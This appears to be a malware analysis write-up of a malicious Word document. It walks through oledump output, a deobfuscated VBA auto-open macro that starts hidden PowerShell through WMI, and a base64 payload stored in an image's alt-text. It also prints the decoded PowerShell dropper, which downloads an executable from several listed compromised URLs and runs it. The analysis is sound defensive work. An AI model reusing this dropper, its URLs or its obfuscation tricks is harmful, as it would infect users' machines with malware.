BcfWWjIUB = Mid _
(C79um_qaar3a8crt, 196, 1)
dYvJsnjw = Mid _
(T9s69dfveqqh1ef5nq, 212, 1)
BiHOVG = Mid _
(Mxpn2nii2x7, 35, 1)
GQJzwq = Mid _
(X9bz6a6f43_hta5ln, 34, 1)
WKcaSvfi = Mid _
(Fuxrbkmu2s17p0j, 9, 1)
lsFUF = Mid _
(Okzpk4tkizyh62u, 240, 1)
VAwYHAcv = Mid _
(Weplip72nljnq8na09, 20, 1)
hNfbEKURZVE = Mid _
(Ox9mobnimxe1_9, 179, 1)
wYVOV = Mid _
(Alt9nfo0b_tg5lmxi, 190, 1)
mLdZb = Mid _
(Hak93bk7htdjvkpy8c, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Bvlfz7n67t8aa75, 33, 1)
zmlHaKIVkFA = Mid _
(Ysctrxs9764oj2fp, 168, 1)
UCPVYn = Mid _
(Dhl_7wcpgpmks, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(J3vsg6taodn, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
End Function

And within the other stream (-s 13) I saw how the macro kicks off – when the Word doc is opened and the macro is run (auto_open).

herbie$ ./oledump.py -v -s 13 LRE-090120\ JYW-092120.doc 
Attribute VB_Name = "V216c23yqw7e5o2v"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
P72j6t412f1985pd6 = Array(J0uidqx1c0a3u + "Th1h6l0aavkju7xS367iljm3kweq5z0v E1eiiunn0096" + Tdkjj9ylr9nquz5ug8, Rn29ystlt6mlp, Uoepmfd2vqk2.Cbzdhgt82a6foxc53q, K7bfvpb88z323z6t43 + "Pgtagw22wfq Q9sf54owsl3 Bf925racvi5276 N6yp3qvf4kub2oguk")
End Sub

Looking at this line, it looks like it is building an array of values to execute the macro. The interesting thing is that none of the values are found in the script (that I could tell) with the exception of “Uoepmfd2vqk2.Cbzdhgt82a6foxc53q” which points to the main function of the script. If I had to hazard a guess, I would say that the other values are just garbage values to help obfuscate the code.

After a while of looking at the script and seeing what lines were valid and which were garbage, there was one thing that stood out to me – the lines to keep were all right before the statement of “Set nnnnnnnnn = Languages.” Once I noticed that, it made cleaning up the script much easier. The following is the script cleaned up.

Function Cbzdhgt82a6foxc53q()
	On Error Resume Next
	Quuseim6entz = 90
	' Chr$(90 + 25) = Chr$(115) = "s"; Vc0veos27yszc is never assigned, so it adds nothing
	Ay7pmbj8ld_rk9 = Vc0veos27yszc + Chr$(Quuseim6entz + (25))
	' With the "g, bq," delimiter stripped, the literal parts read "winmgmt" + "s" + ":win32_" + <form value> + "rocess"
	Ihietwpuyrj0nq6 = "g, bq,g, bq,wg, bq,ig, bq,nmg, bq,g, bq,gmg, bq,tg, bq,g, bq," + Ay7pmbj8ld_rk9 + "g, bq,g, bq,:g, bq,wg, bq,ing, bq,g, bq,3g, bq,2g, bq,_g, bq," + p + "g, bq,rog, bq,g, bq,ceg, bq,sg, bq,sg, bq,"
	Wuueqzhfpms6gh3_p = Zk46e7c8d40(Ihietwpuyrj0nq6)
	Set Cfsnuq6d3vy5e = CreateObject(Wuueqzhfpms6gh3_p)
	' Second object path: the string above plus further values read from Uoepmfd2vqk2 members
	Oxxxpk19hkgi4c7c0z = Zdlifyn2pwzi0u2e4i + Wuueqzhfpms6gh3_p + Ay7pmbj8ld_rk9 + Uoepmfd2vqk2.W8w3wpmit80chp7lx + Uoepmfd2vqk2.Dd8cp5opvyber
	Set Tn1cdl9lltyho4skel = Ngdcwyg32b4skvo5c1(Oxxxpk19hkgi4c7c0z + Uoepmfd2vqk2.Wjhx20hqda94eekj)
	' Create receives the command line returned by Qfyk87zgdp86ufle as its first argument
	Cfsnuq6d3vy5e.Create Qfyk87zgdp86ufle, P3_qwk943i1k8ql6, Tn1cdl9lltyho4skel
End Function

Function Zk46e7c8d40(G7b_e54iwh7id_)
	On Error Resume Next
	X8e38jclqayh83g3a6 = CleanString(G7b_e54iwh7id_)
	' Split on "g, bq," and Join with a never-assigned separator: the delimiter is simply removed
	Hy1d43_mrbnkby5l = Split(X8e38jclqayh83g3a6, "g, bq,")
	B4ru9eb_hhowd = Sg918dyn87p9_2 + Join(Hy1d43_mrbnkby5l, Gcqeayz9i6vt1m44y1)
	Zk46e7c8d40 = B4ru9eb_hhowd
End Function

Function Ngdcwyg32b4skvo5c1(Wu67qms7o3ov3f_u2)
	On Error Resume Next
	Set Ngdcwyg32b4skvo5c1 = GetObject(Wu67qms7o3ov3f_u2)
	' wdKeyEquals - wdKeyEquals = 0, so showwindow is set to 0 on the returned object
	Ngdcwyg32b4skvo5c1.showwindow = wdKeyEquals - wdKeyEquals
End Function

Function Qfyk87zgdp86ufle()
	On Error Resume Next
	' "powe" + "rshe" followed by the alt-text of the document's first inline shape
	Puw2oumxgis = "powe" + "rshe" + V216c23yqw7e5o2v.Content.Application.ActiveDocument.InlineShapes(1@).AlternativeText$
	Qfyk87zgdp86ufle = Zk46e7c8d40(Puw2oumxgis)
End Function

With the script shortened, it was pretty straightforward walking through it and tracing when a function got called and what parameters were passed with it. I had not seen the CleanString method to remove any non-printable spaces before the Join function before. I also was able to use the trick of opening the Word doc up (but not enabling the macro) and pressing ALT-F11 to open the VB for Applications window to see what all was there. I did notice that there was a form there with different values assigned to the “Text” property of the object.

The interesting bit for me about this script, and the main impetus for this write up, was based around this line:

Puw2oumxgis = "powe" + "rshe" + V216c23yqw7e5o2v.Content.Application.ActiveDocument.InlineShapes(1@).AlternativeText$

Looking up “Content.Application.ActiveDocument.InlineShapes(1@).AlternativeText” pointed me to docs and tips about how to add alternative text to a shape or object in an Office doc, either in the GUI or via code in VB. Seeing that there was only 1 image in the Word doc, I opened the properties of the image and looked at the alt-text tab there and got the following:

The following is the string of characters found in the alt-text:


Hrmm. Interesting to say the least considering that there is a method to remove (or split) the characters of “g,bq” after cleaning up all non-printable characters. Once I got rid of those characters, I was left with the following string:


Now I see what is going on – we have a long base64 encoded string for Powershell. The thing that I found odd was that it ended at the character ‘9.’ Decoding that string gave me the following code:

$Uevwzgz=((B+knt)+(45+p));
&(ne+w-it+em) $ENV:usErprOFile\yv3Wm9g\wZN78e8\ -itemtype dIReCToRy;
[Net.ServicePointManager]::"SECUrITYPROtOCol" = ((tls+12,)+ t+(l+s11, t)+l+s);
$Q3ywioo = ((T+ii)+(0+bc)+p);
$Efe5qz9=(W+(z+5d4)+4e);
$Bnp_s5v=$env:userprofile+(((g+QWY+v3)+w+m+9g+(gQ+W)+(Wz+n7)+8e+(8gQ+W))."replAce"(([ChAr]103+[ChAr]81+[ChAr]87),[sTRING][ChAr]92))+$Q3ywioo+(.+(ex+e));
$Xstbuxr
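
The three steps used so far (dropping the junk blocks, removing the "g, bq," delimiter, decoding the -en argument), as an added Python example that is not part of the original analysis or of the tools named in this post. The macro snippet and the benign command are constructed test input and the function names are made up for the example; the decoder also flags base64 that has been cut short, which is how a decode ends mid-statement like the output above.

```python
import base64
import re

DELIM = "g, bq,"                      # delimiter this sample's macro passes to Split()
MARKER = "Set nnnnnnnnn = Languages"  # statement that follows every real line in this sample
BOUNDARY = re.compile(r"^(?:(?:private|public)\s+)?(?:function|sub)\b|^end\s+(?:function|sub)\b", re.I)

# Constructed macro fragment shaped like the oledump output (not taken from the sample).
CONSTRUCTED_MACRO = '''Function Demo()
On Error Resume Next
Set nnnnnnnnn = Languages
Aaa = Mid _
(Bbb, 196, 1)
Ccc = Aaa + Aaa
Cmd = "powe" + "rshe" + AltText
Set nnnnnnnnn = Languages
Aaa = Mid _
(Ddd, 196, 1)
Ccc = Aaa + Aaa
Obj. _
showwindow = 0
Set nnnnnnnnn = Languages
Aaa = Mid _
(Eee, 196, 1)
End Function'''


def logical_lines(src):
    """Join VBA line continuations (a trailing ' _') into single logical lines."""
    out, pending = [], ""
    for raw in src.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.endswith(" _") or line == "_":
            head = line[:-1].rstrip()
            pending += head + ("" if head.endswith(".") else " ")
            continue
        out.append(pending + line)
        pending = ""
    if pending:
        out.append(pending.rstrip())
    return out


def strip_junk(src, marker=MARKER):
    """Keep procedure boundaries plus each statement that sits right before the marker."""
    lines = logical_lines(src)
    kept = []
    for i, line in enumerate(lines):
        before_marker = i + 1 < len(lines) and lines[i + 1] == marker
        if line != marker and (BOUNDARY.match(line) or before_marker):
            kept.append(line)
    return kept


def strip_delimiter(s, delim=DELIM):
    """Python equivalent of the macro's Split(s, delim) followed by Join with no separator."""
    return "".join(s.split(delim))


def decode_encoded_command(cmdline):
    """Return (script, truncated) for a PowerShell -EncodedCommand style argument.

    The value is base64 over UTF-16LE text. An incomplete trailing base64 quantum
    or a dangling half character is dropped and reported as truncated=True.
    """
    for m in re.finditer(r"-(\w+)\s+([A-Za-z0-9+/=]+)", cmdline):
        flag = m.group(1).lower()
        if flag == "ec" or "encodedcommand".startswith(flag):
            token = m.group(2)
            usable = token[: len(token) - len(token) % 4]
            raw = base64.b64decode(usable, validate=True)
            truncated = len(token) % 4 != 0 or len(raw) % 2 != 0
            raw = raw[: len(raw) - len(raw) % 2]
            return raw.decode("utf-16-le", errors="replace"), truncated
    return None, False


def build_constructed_sample(truncate_to=None):
    """Test input only: a benign command laid out the way the alt-text string is."""
    b64 = base64.b64encode("Write-Output 'constructed sample'".encode("utf-16-le")).decode()
    if truncate_to is not None:
        b64 = b64[:truncate_to]          # simulate a string that was cut short
    body = "ll   -en " + b64
    chunks = [body[i:i + 3] for i in range(0, len(body), 3)]
    return DELIM + DELIM.join(chunks) + DELIM


if __name__ == "__main__":
    print("\n".join(strip_junk(CONSTRUCTED_MACRO)))
    for cut in (None, 22):
        cmd = strip_delimiter("powe" + "rshe" + build_constructed_sample(cut))
        script, truncated = decode_encoded_command(cmd)
        print(repr(script), "(truncated)" if truncated else "(complete)")
```
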

Clearly there had to be more to this than that. Unfortunately I was not able to find anything else. I ended up running the sample on my Windows VM and could see that the base64 string was longer than what I had here, so I knew that I was missing something. It was then that I remembered using Didier’s ‘strings.py’ script. I love using this script since I can use the flag of ‘-L’ and have the output sorted from shortest string to the longest string. When I went back and looked at the output, it was here that I noticed where the rest of the base64 script was. The following was split into 2 sections (basically duplicated) when looking at it in strings.py:


I am assuming there is some sort of character limit when looking at it in the GUI versus code. The bit that I had grabbed is only a fourth of all the characters from what I could tell. Taking the above base64 string and decoding it, I got the following (beautified for readability):

$Uevwzgz=((Bknt)(45p));
&(new-item) $ENV:usErprOFile\yv3Wm9g\wZN78e8\ -itemtype dIReCToRy;
[Net.ServicePointManager]::"SEC`UrI`TYP`ROtOC`ol" = ((tls12,) t(ls11, t)ls);
$Q3ywioo = ((Tii)(0bc)p);
$Efe5qz9=(W(z5d4)4e);
$Bnp_s5v=$env:userprofile(((gQWYv3)wm9g(gQW)(Wzn7)8e(8gQW))."rep`l`Ace"(([ChAr]103[ChAr]81[ChAr]87),[sTRING][ChAr]92))$Q3ywioo(.(exe));
$Xstbuxr=((Gde)(y709));
$Tr7y0eg=&(new-object) NET.WebClient;
$Cxeakrq=((http://haymetetrading.)(com/wp-include)(s/yG)EL(Kj4/*http):(//s)imoff(erbd)(24.com)(/wp-i)(nclude)s(/fsiQc)/*ht(tp://401kplansinfo)(.com)(/cgi)-b(in/KtFRk/*ht)(tp:)//(fidelity)(guide.com/)cgi-(bin/)(VA/*http://)(sirnakmidye)(ci.c)(om/)(wp-)includ(es/q)k9w(W2/*h)t(tps://sub)(itocarne).com/w(p-conten)(t/ByeOAt)(9/*https:)(//elies)(alib)(aarc)(hitect.com/wordpress/T/))."s`PLIT"([char]42);
$Srpub65=((I6zd_l)r);
foreach($Qecgt4y in $Cxeakrq){try{$Tr7y0eg."Do`Wn`LOADfilE"($Qecgt4y, $Bnp_s5v);
$Crcttnv=((Rcum)ukx);
If ((.(Get-Item) $Bnp_s5v)."Le`N`GTH" -ge 37976) {&(Invoke-Item)($Bnp_s5v);
$Cnmnv1b=(E1(z0nc9));
break;
$Euo8ohn=(W(7_lr4c))}}catch{}}$Um80fvt=((A6m)x7vl)

The following is my attempt to deobfuscate the script function by function as I walked my way through it. The only part that is not in there is the expanded base64 found above. The part not indented is the original and the one that is indented is the de-obfuscated code with the values dropped in for completeness.

Function Cbzdhgt82a6foxc53q()
   On Error Resume Next
   Quuseim6entz = 90
   Ay7pmbj8ld_rk9 = Vc0veos27yszc + Chr$(Quuseim6entz + (25))
   Ihietwpuyrj0nq6 = "g, bq,g, bq,wg, bq,ig, bq,nmg, bq,g, bq,gmg, bq,tg, bq,g, bq," + Ay7pmbj8ld_rk9 + "g, bq,g, bq,:g, bq,wg, bq,ing, bq,g, bq,3g, bq,2g, bq,_g, bq," + p + "g, bq,rog,   bq,g, bq,ceg, bq,sg, bq,sg, bq,"
   Wuueqzhfpms6gh3_p = Zk46e7c8d40(Ihietwpuyrj0nq6)
   Set Cfsnuq6d3vy5e = CreateObject(Wuueqzhfpms6gh3_p)
   Oxxxpk19hkgi4c7c0z = Zdlifyn2pwzi0u2e4i + Wuueqzhfpms6gh3_p + Ay7pmbj8ld_rk9 + Uoepmfd2vqk2.W8w3wpmit80chp7lx + Uoepmfd2vqk2.Dd8cp5opvyber
   Set Tn1cdl9lltyho4skel = Ngdcwyg32b4skvo5c1(Oxxxpk19hkgi4c7c0z + Uoepmfd2vqk2.Wjhx20hqda94eekj)
   Cfsnuq6d3vy5e.Create Qfyk87zgdp86ufle, P3_qwk943i1k8ql6, Tn1cdl9lltyho4skel
End Function
      
      Function Cbzdhgt82a6foxc53q()
         On Error Resume Next
         Quuseim6entz = 90
         Ay7pmbj8ld_rk9 = s (Vc0veos27yszc gets dropped since it is empty/null)
         Ihietwpuyrj0nq6 = "g, bq,g, bq,wg, bq,ig, bq,nmg, bq,g, bq,gmg, bq,tg, bq,g, bq," + s + "g, bq,g, bq,:g, bq,wg, bq,ing, bq,g, bq,3g, bq,2g, bq,_g, bq," + p + "g, bq,rog,   bq,g, bq,ceg,      bq,sg, bq,sg, bq,"
         Wuueqzhfpms6gh3_p = winmgmt"+s+":win32_"+p+"rocess
         Set Cfsnuq6d3vy5e = CreateObject(winmgmt"+s+":win32_"+p+"rocess)
         Oxxxpk19hkgi4c7c0z = winmgmt"+s+":win32_"+p+"rocess + s + tar + tu
         Set Tn1cdl9lltyho4skel = winmgmt"+s+":win32_"+p+"rocess + s + tar + tu + p
         Cfsnuq6d3vy5e.Create "powe" + "rshe" + ,,l,l, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,-,e,n, JAB,VAG,UAd,gB3,AHo,AZw,B6A,D0A,KAA,oAC,cAQ,gAn,ACs,AJw,BrA,G4A,dAA,nAC,kAK,wAo,ACc,ANA,A1A,CcA,KwA,nAH,AAJ,wAp,ACk,AOw,AmA,CgA,JwB,uAG,UAJ,wAr,ACc,Adw,AtA,GkA,dAA,nAC,sAJ,wBl,AG0,AJw,ApA,CAA,JAB,FAE,4AV,gA6,AHU,Acw,BFA,HIA,cAB,yAE,8AR,gBp,AGw,AZQ,BcA,HkA,dgA,zAF,cAb,QA5,AGc,AXA,B3A,FoA,TgA,3AD,gAZ,QA4,AFw,AIA,AtA,GkA,dAB,lAG,0Ad,AB5,AHA,AZQ,AgA,GQA,SQB,SAG,UAQ,wBU,AG8,AUg,B5A,DsA,WwB,OAG,UAd,AAu,AFM,AZQ,ByA,HYA,aQB,jAG,UAU,ABv,AGk,Abg,B0A,E0A,YQB,uAG,EAZ,wBl,AHI,AXQ,A6A,DoA,IgB,TAE,UAQ,wBg,AFU,Acg,BJA,GAA,VAB,ZAF,AAY,ABS,AE8,AdA,BPA,EMA,YAB,vAG,wAI,gAg,AD0,AIA,AoA,CgA,JwB,0AG,wAc,wAn,ACs,AJw,AxA,DIA,LAA,nAC,kAK,wAn,ACA,AdA,AnA,CsA,KAA,nAG,wAJ,wAr,ACc,Acw,AxA,DEA,LAA,gAH,QAJ,wAp,ACs,AJw,BsA,CcA,KwA,nAH,MAJ,wAp,ADs,AJA,BRA,DMA,eQB,3AG,kAb,wBv,ACA,APQ,AgA,CgA,KAA,nAF,QAJ,wAr,ACc,AaQ,BpA,CcA,KQA,rAC,gAJ,wAw,ACc,AKw,AnA,GIA,YwA,nAC,kAK,wAn,AHA,AJw,ApA,DsA,JAB,FAG,YAZ,QA1,AHE,Aeg,A5A,D0A,KAA,nAF,cAJ,wAr,ACg,AJw,B6A,CcA,KwA,nAD,UAZ,AA0,ACc,AKQ,ArA,CcA,NAB,lAC,cAK,QA7,ACQ,AQg,BuA,HAA,XwB,zAD,UAd,gA9,ACQ,AZQ,BuA,HYA,OgB,1AH,MAZ,QBy,AHA,Acg,BvA,GYA,aQB,sAG,UAK,wAo,ACg,AKA,AnA,GcA,JwA,rAC,cAU,QBX,AFk,AJw,ArA,CcA,dgA,zAC,cAK,QAr,ACc,Adw,AnA,CsA,JwB,tAC,cAK,wAn,ADk,AZw,AnA,CsA,KAA,nAG,cAU,QAn,ACs,AJw,BXA,CcA,KQA,rAC,gAJ,wBX,AHo,AJw,ArA,CcA,bgA,3AC,cAK,QAr,ACc,AOA,BlA,CcA,KwA,oAC,cAO,ABn,AFE,AJw,ArA,CcA,VwA,nAC,kAK,QAu,ACI,Acg,BlA,HAA,YAB,sAG,AAQ,QBj,AGU,AIg,AoA,CgA,WwB,DAG,gAQ,QBy,AF0,AMQ,AwA,DMA,KwB,bAE,MAa,ABB,AHI,AXQ,A4A,DEA,KwB,bAE,MAa,ABB,AHI,AXQ,A4A,DcA,KQA,sAF,sAc,wBU,AFI,ASQ,BOA,EcA,XQB,bAE,MAa,ABB,AHI,AXQ,A5A,DIA,KQA,pAC,sAJ,ABR,ADM,AeQ,B3A,GkA,bwB,vAC,sAK,AAn,AC4,AJw,ArA,CgA,JwB,lAH,gAJ,wAr,ACc,AZQ,AnA,CkA,KQA,7AC,QAW,ABz,AHQ,AYg,B1A,HgA,cgA,9, winmgmt"+s+":win32_"+p+"rocess + s + tar + tu + p
      End Function

Function Zk46e7c8d40(G7b_e54iwh7id_)
   On Error Resume Next
   X8e38jclqayh83g3a6 = CleanString(G7b_e54iwh7id_)
   Hy1d43_mrbnkby5l = Split(X8e38jclqayh83g3a6, "g, bq,")
   B4ru9eb_hhowd = Sg918dyn87p9_2 + Join(Hy1d43_mrbnkby5l, Gcqeayz9i6vt1m44y1)
   Zk46e7c8d40 = B4ru9eb_hhowd
End Function

   Function Zk46e7c8d40(G7b_e54iwh7id_)
      On Error Resume Next
      X8e38jclqayh83g3a6 = "g,bq,g,bq,wg,bq,ig,bq,nmg,bq,g,bq,gmg,bq,tg,bq,g,bq,"+s+"g,bq,g,bq,:g,bq,wg,bq,ing,bq,g,bq,3g,bq,2g,bq,_g,bq,"+p+"g,bq,rog,bq,g,bq,ceg,bq,sg,bq,sg,bq,"
      Hy1d43_mrbnkby5l = winmgmt"+s+":win32_"+p+"rocess
      B4ru9eb_hhowd = winmgmt"+s+":win32_"+p+"rocess (Sg918dyn87p9_2/Gcqeayz9i6vt1m44y1 gets dropped since null/empty)
      Zk46e7c8d40 = winmgmt"+s+":win32_"+p+"rocess
   End Function

Function Ngdcwyg32b4skvo5c1(Wu67qms7o3ov3f_u2)
   On Error Resume Next
   Set Ngdcwyg32b4skvo5c1 = GetObject(Wu67qms7o3ov3f_u2)
   showwindow = wdKeyEquals - wdKeyEquals
End Function
   
   Function Ngdcwyg32b4skvo5c1(winmgmt"+s+":win32_"+p+"rocess + s + tar + tu + p)
      On Error Resume Next
      Set Ngdcwyg32b4skvo5c1 = GetObject(winmgmt"+s+":win32_"+p+"rocess + s + tar + tu + p)
      showwindow = 0
   End Function

Function Qfyk87zgdp86ufle()
   On Error Resume Next
   Puw2oumxgis = "powe" + "rshe" + V216c23yqw7e5o2v.Content.Application.ActiveDocument.InlineShapes(1@).AlternativeText$
   Qfyk87zgdp86ufle = Zk46e7c8d40(Puw2oumxgis)
End Function

   Function Qfyk87zgdp86ufle()
      On Error Resume Next
      Puw2oumxgis = "powe" + "rshe" + g, bq,g, bq,lg, bq,lg, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq, g, bq,-g, bq,eg, bq,ng, bq, JABg, bq,VAGg, bq,UAdg, bq,gB3g, bq,AHog, bq,AZwg, bq,B6Ag, bq,D0Ag, bq,KAAg, bq,oACg, bq,cAQg, bq,gAng, bq,ACsg, bq,AJwg, bq,BrAg, bq,G4Ag, bq,dAAg, bq,nACg, bq,kAKg, bq,wAog, bq,ACcg, bq,ANAg, bq,A1Ag, bq,CcAg, bq,KwAg, bq,nAHg, bq,AAJg, bq,wApg, bq,ACkg, bq,AOwg, bq,AmAg, bq,CgAg, bq,JwBg, bq,uAGg, bq,UAJg, bq,wArg, bq,ACcg, bq,Adwg, bq,AtAg, bq,GkAg, bq,dAAg, bq,nACg, bq,sAJg, bq,wBlg, bq,AG0g, bq,AJwg, bq,ApAg, bq,CAAg, bq,JABg, bq,FAEg, bq,4AVg, bq,gA6g, bq,AHUg, bq,Acwg, bq,BFAg, bq,HIAg, bq,cABg, bq,yAEg, bq,8ARg, bq,gBpg, bq,AGwg, bq,AZQg, bq,BcAg, bq,HkAg, bq,dgAg, bq,zAFg, bq,cAbg, bq,QA5g, bq,AGcg, bq,AXAg, bq,B3Ag, bq,FoAg, bq,TgAg, bq,3ADg, bq,gAZg, bq,QA4g, bq,AFwg, bq,AIAg, bq,AtAg, bq,GkAg, bq,dABg, bq,lAGg, bq,0Adg, bq,AB5g, bq,AHAg, bq,AZQg, bq,AgAg, bq,GQAg, bq,SQBg, bq,SAGg, bq,UAQg, bq,wBUg, bq,AG8g, bq,AUgg, bq,B5Ag, bq,DsAg, bq,WwBg, bq,OAGg, bq,UAdg, bq,AAug, bq,AFMg, bq,AZQg, bq,ByAg, bq,HYAg, bq,aQBg, bq,jAGg, bq,UAUg, bq,ABvg, bq,AGkg, bq,Abgg, bq,B0Ag, bq,E0Ag, bq,YQBg, bq,uAGg, bq,EAZg, bq,wBlg, bq,AHIg, bq,AXQg, bq,A6Ag, bq,DoAg, bq,IgBg, bq,TAEg, bq,UAQg, bq,wBgg, bq,AFUg, bq,Acgg, bq,BJAg, bq,GAAg, bq,VABg, bq,ZAFg, bq,AAYg, bq,ABSg, bq,AE8g, bq,AdAg, bq,BPAg, bq,EMAg, bq,YABg, bq,vAGg, bq,wAIg, bq,gAgg, bq,AD0g, bq,AIAg, bq,AoAg, bq,CgAg, bq,JwBg, bq,0AGg, bq,wAcg, bq,wAng, bq,ACsg, bq,AJwg, bq,AxAg, bq,DIAg, bq,LAAg, bq,nACg, bq,kAKg, bq,wAng, bq,ACAg, bq,AdAg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,wAJg, bq,wArg, bq,ACcg, bq,Acwg, bq,AxAg, bq,DEAg, bq,LAAg, bq,gAHg, bq,QAJg, bq,wApg, bq,ACsg, bq,AJwg, bq,BsAg, bq,CcAg, bq,KwAg, bq,nAHg, bq,MAJg, bq,wApg, 
bq,ADsg, bq,AJAg, bq,BRAg, bq,DMAg, bq,eQBg, bq,3AGg, bq,kAbg, bq,wBvg, bq,ACAg, bq,APQg, bq,AgAg, bq,CgAg, bq,KAAg, bq,nAFg, bq,QAJg, bq,wArg, bq,ACcg, bq,AaQg, bq,BpAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wAwg, bq,ACcg, bq,AKwg, bq,AnAg, bq,GIAg, bq,YwAg, bq,nACg, bq,kAKg, bq,wAng, bq,AHAg, bq,AJwg, bq,ApAg, bq,DsAg, bq,JABg, bq,FAGg, bq,YAZg, bq,QA1g, bq,AHEg, bq,Aegg, bq,A5Ag, bq,D0Ag, bq,KAAg, bq,nAFg, bq,cAJg, bq,wArg, bq,ACgg, bq,AJwg, bq,B6Ag, bq,CcAg, bq,KwAg, bq,nADg, bq,UAZg, bq,AA0g, bq,ACcg, bq,AKQg, bq,ArAg, bq,CcAg, bq,NABg, bq,lACg, bq,cAKg, bq,QA7g, bq,ACQg, bq,AQgg, bq,BuAg, bq,HAAg, bq,XwBg, bq,zADg, bq,UAdg, bq,gA9g, bq,ACQg, bq,AZQg, bq,BuAg, bq,HYAg, bq,OgBg, bq,1AHg, bq,MAZg, bq,QByg, bq,AHAg, bq,Acgg, bq,BvAg, bq,GYAg, bq,aQBg, bq,sAGg, bq,UAKg, bq,wAog, bq,ACgg, bq,AKAg, bq,AnAg, bq,GcAg, bq,JwAg, bq,rACg, bq,cAUg, bq,QBXg, bq,AFkg, bq,AJwg, bq,ArAg, bq,CcAg, bq,dgAg, bq,zACg, bq,cAKg, bq,QArg, bq,ACcg, bq,Adwg, bq,AnAg, bq,CsAg, bq,JwBg, bq,tACg, bq,cAKg, bq,wAng, bq,ADkg, bq,AZwg, bq,AnAg, bq,CsAg, bq,KAAg, bq,nAGg, bq,cAUg, bq,QAng, bq,ACsg, bq,AJwg, bq,BXAg, bq,CcAg, bq,KQAg, bq,rACg, bq,gAJg, bq,wBXg, bq,AHog, bq,AJwg, bq,ArAg, bq,CcAg, bq,bgAg, bq,3ACg, bq,cAKg, bq,QArg, bq,ACcg, bq,AOAg, bq,BlAg, bq,CcAg, bq,KwAg, bq,oACg, bq,cAOg, bq,ABng, bq,AFEg, bq,AJwg, bq,ArAg, bq,CcAg, bq,VwAg, bq,nACg, bq,kAKg, bq,QAug, bq,ACIg, bq,Acgg, bq,BlAg, bq,HAAg, bq,YABg, bq,sAGg, bq,AAQg, bq,QBjg, bq,AGUg, bq,AIgg, bq,AoAg, bq,CgAg, bq,WwBg, bq,DAGg, bq,gAQg, bq,QByg, bq,AF0g, bq,AMQg, bq,AwAg, bq,DMAg, bq,KwBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A4Ag, bq,DEAg, bq,KwBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A4Ag, bq,DcAg, bq,KQAg, bq,sAFg, bq,sAcg, bq,wBUg, bq,AFIg, bq,ASQg, bq,BOAg, bq,EcAg, bq,XQBg, bq,bAEg, bq,MAag, bq,ABBg, bq,AHIg, bq,AXQg, bq,A5Ag, bq,DIAg, bq,KQAg, bq,pACg, bq,sAJg, bq,ABRg, bq,ADMg, bq,AeQg, bq,B3Ag, bq,GkAg, bq,bwBg, bq,vACg, bq,sAKg, bq,AAng, bq,AC4g, bq,AJwg, bq,ArAg, bq,CgAg, bq,JwBg, bq,lAHg, 
bq,gAJg, bq,wArg, bq,ACcg, bq,AZQg, bq,AnAg, bq,CkAg, bq,KQAg, bq,7ACg, bq,QAWg, bq,ABzg, bq,AHQg, bq,AYgg, bq,B1Ag, bq,HgAg, bq,cgAg, bq,9
      
      Qfyk87zgdp86ufle = "powe" + "rshe" + ,,l,l, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,-,e,n, JAB,VAG,UAd,gB3,AHo,AZw,B6A,D0A,KAA,oAC,cAQ,gAn,ACs,AJw,BrA,G4A,dAA,nAC,kAK,wAo,ACc,ANA,A1A,CcA,KwA,nAH,AAJ,wAp,ACk,AOw,AmA,CgA,JwB,uAG,UAJ,wAr,ACc,Adw,AtA,GkA,dAA,nAC,sAJ,wBl,AG0,AJw,ApA,CAA,JAB,FAE,4AV,gA6,AHU,Acw,BFA,HIA,cAB,yAE,8AR,gBp,AGw,AZQ,BcA,HkA,dgA,zAF,cAb,QA5,AGc,AXA,B3A,FoA,TgA,3AD,gAZ,QA4,AFw,AIA,AtA,GkA,dAB,lAG,0Ad,AB5,AHA,AZQ,AgA,GQA,SQB,SAG,UAQ,wBU,AG8,AUg,B5A,DsA,WwB,OAG,UAd,AAu,AFM,AZQ,ByA,HYA,aQB,jAG,UAU,ABv,AGk,Abg,B0A,E0A,YQB,uAG,EAZ,wBl,AHI,AXQ,A6A,DoA,IgB,TAE,UAQ,wBg,AFU,Acg,BJA,GAA,VAB,ZAF,AAY,ABS,AE8,AdA,BPA,EMA,YAB,vAG,wAI,gAg,AD0,AIA,AoA,CgA,JwB,0AG,wAc,wAn,ACs,AJw,AxA,DIA,LAA,nAC,kAK,wAn,ACA,AdA,AnA,CsA,KAA,nAG,wAJ,wAr,ACc,Acw,AxA,DEA,LAA,gAH,QAJ,wAp,ACs,AJw,BsA,CcA,KwA,nAH,MAJ,wAp,ADs,AJA,BRA,DMA,eQB,3AG,kAb,wBv,ACA,APQ,AgA,CgA,KAA,nAF,QAJ,wAr,ACc,AaQ,BpA,CcA,KQA,rAC,gAJ,wAw,ACc,AKw,AnA,GIA,YwA,nAC,kAK,wAn,AHA,AJw,ApA,DsA,JAB,FAG,YAZ,QA1,AHE,Aeg,A5A,D0A,KAA,nAF,cAJ,wAr,ACg,AJw,B6A,CcA,KwA,nAD,UAZ,AA0,ACc,AKQ,ArA,CcA,NAB,lAC,cAK,QA7,ACQ,AQg,BuA,HAA,XwB,zAD,UAd,gA9,ACQ,AZQ